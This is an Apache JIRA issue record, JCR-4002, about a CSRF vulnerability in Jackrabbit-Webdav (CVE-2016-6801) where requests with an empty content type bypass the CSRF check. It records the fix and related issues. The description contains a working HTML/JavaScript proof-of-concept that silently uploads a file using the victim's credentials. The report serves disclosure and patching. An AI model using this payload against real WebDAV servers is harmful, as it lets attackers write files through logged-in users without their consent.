[JCR-4002] CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801) - ASF JIRA

XML

Word

Printable

JSON

Details

Type: Bug
Status: Closed
Priority: Blocker
Resolution: Fixed
Affects Version/s: 2.13.1
Fix Version/s: 2.13.2, 2.14
Component/s: jackrabbit-webdav
Labels:
- csrf
- security
- webdav

Description

As per [0] the CSRF content-type check does not include a null request content type. This can be exploited to create a resource via CSRF like so:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
        xhr.withCredentials = true;
        var body = "This file has been uploaded via CSRF.=\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

I will mitigate this particular issue by including a null content type in the list of rejected content types.

[0] https://github.com/cryptomator/cryptomator/issues/319

Attachments

- Sort By Name
- Sort By Date
- Ascending
- Descending

JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
16/Aug/16 07:50
15 kB
Dominique Jäggi
CVE-2016-6801.txt
14/Sep/16 12:37
2 kB
Julian Reschke

Issue Links

breaks

JCR-4009 CSRF in Jackrabbit-Webdav (CVE-2016-6801)

Closed

is related to

SLING-5957 SlingPostServlet: susceptible CSRF with empty content-type

Resolved

relates to

JCR-3909 CSRF bug in Jackrabbit-Webdav

Closed

Activity

People

Assignee:: Dominique Jäggi

Reporter:: Dominique Jäggi

Votes:: 0 Vote for this issue

Watchers:: 5 Start watching this issue

Dates

Created:: 12/Aug/16 12:02

Updated:: 10/Nov/16 09:18

Resolved:: 17/Aug/16 09:55